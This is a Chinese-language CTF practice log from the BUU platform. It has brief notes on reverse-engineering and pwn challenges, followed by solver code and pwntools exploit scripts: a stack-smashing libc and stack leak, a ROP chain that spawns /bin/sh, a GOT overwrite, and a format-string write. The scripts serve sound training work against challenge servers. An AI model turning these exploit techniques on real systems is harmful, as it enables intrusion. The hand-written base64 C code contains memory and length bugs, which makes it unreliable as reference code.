21 08 08学习总结

21.08.08学习总结

Tags: learning experience

不知道什么时间-不知道什么时间: BUU刷题

re找门:

xor: 一个数xor同一个数两次之后仍然是其本身

reverse3: 一个base64的加密, 主函数里有个+i的操作, 把+i消去之后base64解密就行了, 但是因为是萌新第一次接触re的base64, 于是就自己写了个base64的加密与解密练手(ida的ctrl e是直接选取字符串)

helloword: jeb打开, 就能直接找到了

SimpleRev: 前面有几个"加密"是大小写转换, 后面的一个加密直接爆破就行了(欧对, ida的局部变量字符串给出来的是反的, 因为这个我前几次flag都是错的, 捏麻麻的)

[BJDCTF2020]JustRE: 啊这, 去年没做出来的题目发现shift f12就行了

PWN:

wdb2018_guess: 算是第一次做出涉及fork的题目? 先描述一下fork出来进程的一些特点偏移, canary啥的都不会变, 然后就可以爆破啦, 然后这道题由于是fork, 所以先用stack smashing泄露libc, 再把environ+libc_base写到__libc_argv[0]位置以直接获取栈地址, 最后通过计算栈上偏移再次覆盖__libc_argv[0]为存储flag的栈地址, 获取flag

picoctf_2018_can_you_gets_me: 用ropper直接生成就行了…

picoctf_2018_got_shell: 改got表, 懒得做

mrctf2020_easy_equation: z3获取judge值, 然后格式化改值就行了

exp:

Re:

reverse3(一个base64的加密解密):

#include <iostream>
#include <stdlib.h>
#include <stdint.h>
#include <stdio.h>
#include <ctype.h>

char base64_array[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

char * encode(char* ori)
{
    
    
    char tmp[3] = "";
    char * ori_code = ori;
    int i = 0;
    int ori_len = strlen(ori);
    if (ori_len % 3) {
    
    
        ori_len++;
    }
    int code_len = ori_len * 4;
    int encode_code_cnt = 0;
    char * encode_code = (char *)malloc(code_len + 1);
    memset(encode_code, 0, strlen(encode_code));
    char* begin_encode = encode_code;
    while (code_len) {
    
    
        for (i = 0; (i < 3 && ori_len>0); i++)
        {
    
    
            tmp[i] = *ori;
            ori++;
            ori_len--;
        }
        if (tmp[i - 1] == '\0')
        {
    
    
            i--;
        }
        /* 对末字节做处理 */
        if (!i)
        {
    
    
            break;
        }
        switch (i)
        {
    
    
        /* 只能取得一个字节 */
        case 1:
            *(encode_code + (encode_code_cnt++)) = base64_array[(tmp[0] >> 2)];
            *(encode_code + (encode_code_cnt++)) = base64_array[(tmp[0] & 3) * 16 + (tmp[1] >> 4)];
            *(encode_code + (encode_code_cnt++)) = '=';
            *(encode_code + (encode_code_cnt++)) = '=';
            break;
        /* 剩余两个字节 */
        case 2:
            *(encode_code + (encode_code_cnt++)) = base64_array[tmp[0] >> 2];
            *(encode_code + (encode_code_cnt++)) = base64_array[(tmp[0] & 3) * 16 + (tmp[1] >> 4)];
            *(encode_code + (encode_code_cnt++)) = base64_array[(tmp[1] & 0xf) * 4 + (tmp[2] >> 6)];
            *(encode_code + (encode_code_cnt++)) = '=';
            break;
        /* 常规情况 */
        case 3:
            *(encode_code + (encode_code_cnt++)) = base64_array[tmp[0] >> 2];
            *(encode_code + (encode_code_cnt++)) = base64_array[(tmp[0] & 3) * 16 + (tmp[1] >> 4)];
            *(encode_code + (encode_code_cnt++)) = base64_array[(tmp[1] & 0xf) * 4 + (tmp[2] >> 6)];
            *(encode_code + (encode_code_cnt++)) = base64_array[(tmp[2] & 0x3f)];
            break;
        default:
            break;
        }
    }
    *(encode_code + (++encode_code_cnt)) = '\0';
    return begin_encode;
}

int list(char aa)
{
    
    
    int a = 0;
    for (a = 0; a < 64; a++)
    {
    
    
        if (base64_array[a] == aa)break;
    }
    return a;
}

char* decode(char* fin)
{
    
    
    int fin_len = strlen(fin);
    int fin_group = fin_len / 4;
    int i = 0;
    char* beg_fin = fin;
    char* last = (char*)malloc(fin_group + 1);
    char* retlast = last;
    memset(last, NULL, strlen(last));
    char tmp[4] = "";
    int n[4] = {
    
     0 };
    while (fin_len)
    {
    
    
        for (i = 0; (i < 4 && fin_group > 0); i++)
        {
    
    
            tmp[i] = *fin;
            fin++;
        }
        fin_group--;
        if (!fin_group)
        {
    
    
            fin_len = 0;
            for (i = 0; i < 4;)
            {
    
    
                i++;
                if (tmp[i] == '=')
                {
    
    
                    break;
                }
            }
        }
        switch (i)
        {
    
    
        case 1:
            n[0] = list(tmp[0]);
            *last = char((n[0] << 2));
            break;
        case 2:
            n[0] = list(tmp[0]);
            n[1] = list(tmp[1]);
            *last = char((n[0] << 2) + ((n[1] >> 4) & 3));
            last++;
            *last = char((n[1] & 0xf) << 4);
            break;
        case 3:
            n[0] = list(tmp[0]);
            n[1] = list(tmp[1]);
            n[2] = list(tmp[2]);
            *last = char((n[0] << 2) + ((n[1] >> 4) & 3));
            last++;
            *last = char(((n[1] & 0xf) << 4) + ((n[2] >> 2) & 0xf));
            last++;
            *last = char((n[2] & 3) << 6);
            break;
        case 4:
            n[0] = list(tmp[0]);
            n[1] = list(tmp[1]);
            n[2] = list(tmp[2]);
            n[3] = list(tmp[3]);
            *last = char((n[0] << 2) + ((n[1] >> 4) & 3));
            last++;
            *last = char(((n[1] & 0xf) << 4) + ((n[2] >> 2) & 0xf));
            last++;
            *last = char(((n[2] & 3) << 6) + (n[3] & 0x3f));
            last++;
            break;
        default:
            break;
        }
    }
    return retlast;
}

int main()
{
    
    
    char ori[] = "e3nifIH9b_C@n@dH";
    //char* fin = encode(ori);
   // printf("encode: %s", fin);
    for (int i = 0; ori[i]; i++)
    {
    
    
        ori[i] -= i;
    }
    char* beg = decode(ori);
    printf("\ndecode: %s", beg);
    return 0;
}

SimpleRev::

#include <stdlib.h>
#include <stdint.h>
#include <stdio.h>
#include <ctype.h>

char key[128]={
    
    NULL};
char key1[]="ADSFK";
char key2[];
char key3[]="kills";
char* text;

char* join(char* key, char* v)
{
    
    
	int v2=strlen(key);
	int v3=strlen(v);
	char* dest=(char*)malloc(v2+v3+1);
	if(!dest)exit(1);
	strcpy(dest, key);
	strcat(dest, v);
	return dest;
}

int main()
{
    
    
	char v9[]="hadow";
	char src[]="NDCLS";
	text=join(key3, v9);
	strcpy(key, key1);
	strcat(key, src);
	printf("text: %s\n", text);
	printf("key: %s\n", key);
	int v5=strlen(key);
	int v2=0;
	int v3=0;
	int i=0;
	for(i=0;i<v5;++i)
	{
    
    
		if(key[v3%v5]>64&&key[v3%v5]<=90)
		{
    
    
			key[i]=key[v3%v5]+32;
		}
		v3++;
	}
	printf("key: %s\n", key);
	int cnt=0;
	char str2[100]={
    
    NULL};
	while(text[cnt])
	{
    
    
		int tmp=0;
		char t;
		int flag=0;
		for(tmp=0x41;tmp<=0x5a;tmp++)
		{
    
    
			t=((char)tmp-39-key[v3%v5]+97)%26+97;
			if(t==text[cnt]){
    
    
				flag=1;
				break;
			}
		}
		if(flag)
		{
    
    
			str2[cnt]=(char)tmp;
			v3++;
			cnt++;
			continue;
		}
		for(tmp='a';tmp<='z';tmp++)
		{
    
    
			t=((char)tmp-39-key[v3 % v5]+97)%26+97;
			if(t==text[cnt]){
    
    
				flag=1;
				break;
			}
		}
		if(flag)
		{
    
    
			str2[cnt]=(char)tmp;
			v3++;
			cnt++;
			continue;
		}
	}
	printf("flag{%s}", str2);
	return 0;
}

Pwn:

wdb2018_guess:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./GUESS')
sh=remote('node4.buuoj.cn',28433)
elf=ELF('./GUESS')
libc=ELF('./libc/libc.so.6')
#libc=elf.libc
context.log_level='debug'

sh.recv()
payload1=p64(elf.got['puts'])*0x50
sh.sendline(payload1)
sh.recvuntil('stack smashing detected ***: ')
puts_addr=u64(sh.recv(6).ljust(8, '\x00'))
libc_base=puts_addr-libc.sym['puts']
log.success('libc base: '+hex(libc_base))
environ_addr=libc_base+libc.sym['environ']
sh.recv()
payload2=p64(environ_addr)*0x50
sh.sendline(payload2)
sh.recvuntil('stack smashing detected ***: ')
stack_addr=u64(sh.recv(6).ljust(8, '\x00'))

sh.recv()
payload3=p64(stack_addr-0x168)*0x50
sh.sendline(payload3)
print sh.recv()
sh.interactive()

picoctf_2018_can_you_gets_me:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
from struct import pack

p = lambda x : pack('I', x)

IMAGE_BASE_0 = 0x08048000 # 0d55f76dca57a92650c686ea9d1e1cf111a10d921da1a5dec409ba1f5a716f08
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

sh=remote('node4.buuoj.cn',29325)
#sh=process('./PicoCTF_2018_can-you-gets-me')

sh.recv()
rop = 'a'*28

rop += rebase_0(0x000701c6) # 0x080b81c6: pop eax; ret;
rop += '//bi'
rop += rebase_0(0x0002702a) # 0x0806f02a: pop edx; ret;
rop += rebase_0(0x000a2060)
rop += rebase_0(0x0000c9db) # 0x080549db: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x000701c6) # 0x080b81c6: pop eax; ret;
rop += 'n/sh'
rop += rebase_0(0x0002702a) # 0x0806f02a: pop edx; ret;
rop += rebase_0(0x000a2064)
rop += rebase_0(0x0000c9db) # 0x080549db: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x000701c6) # 0x080b81c6: pop eax; ret;
rop += p(0x00000000)
rop += rebase_0(0x0002702a) # 0x0806f02a: pop edx; ret;
rop += rebase_0(0x000a2068)
rop += rebase_0(0x0000c9db) # 0x080549db: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x000001c9) # 0x080481c9: pop ebx; ret;
rop += rebase_0(0x000a2060)
rop += rebase_0(0x00096955) # 0x080de955: pop ecx; ret;
rop += rebase_0(0x000a2068)
rop += rebase_0(0x0002702a) # 0x0806f02a: pop edx; ret;
rop += rebase_0(0x000a2068)
rop += rebase_0(0x000701c6) # 0x080b81c6: pop eax; ret;
rop += p(0x0000000b)
rop += rebase_0(0x00027630) # 0x0806f630: int 0x80; ret;
sh.sendline(rop)
sh.interactive()

picoctf_2018_got_shell:

#!/usr/bin/env python
# coding=utf-8
from pwn import *

r=remote('node4.buuoj.cn', 26201)
#r=process('./PicoCTF_2018_got-shell')
elf=ELF('./PicoCTF_2018_got-shell')
puts_got=elf.got['puts']
win_addr=elf.symbols['win']

r.recvuntil("I'll let you write one 4 byte value to memory. Where would you like to write this 4 byte value?")
r.sendline(hex(puts_got))

r.recv()
r.sendline(hex(win_addr))

r.interactive()

mrctf2020_easy_equation:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
from z3 import *
context.log_level='debug'
#sh=process('./mrctf2020_easy_equation')
sh=remote('node4.buuoj.cn',28588)
elf=ELF('./mrctf2020_easy_equation')
context.binary=elf
def decode():
    a1=Int('a1')
    s=Solver()
    s.add(-7*a1+11*a1*a1+17*a1*a1*a1*a1-13*a1*a1*a1==198)
    print s.check()
    result=s.model()
    print "a1=%s" % result[a1]
    return result[a1].as_long()

#gdb.attach(sh)
result=decode()
payload='a'+fmtstr_payload(8, {
    
    0x60105C:result}, numbwritten=1)
sh.sendline(payload)
sh.interactive()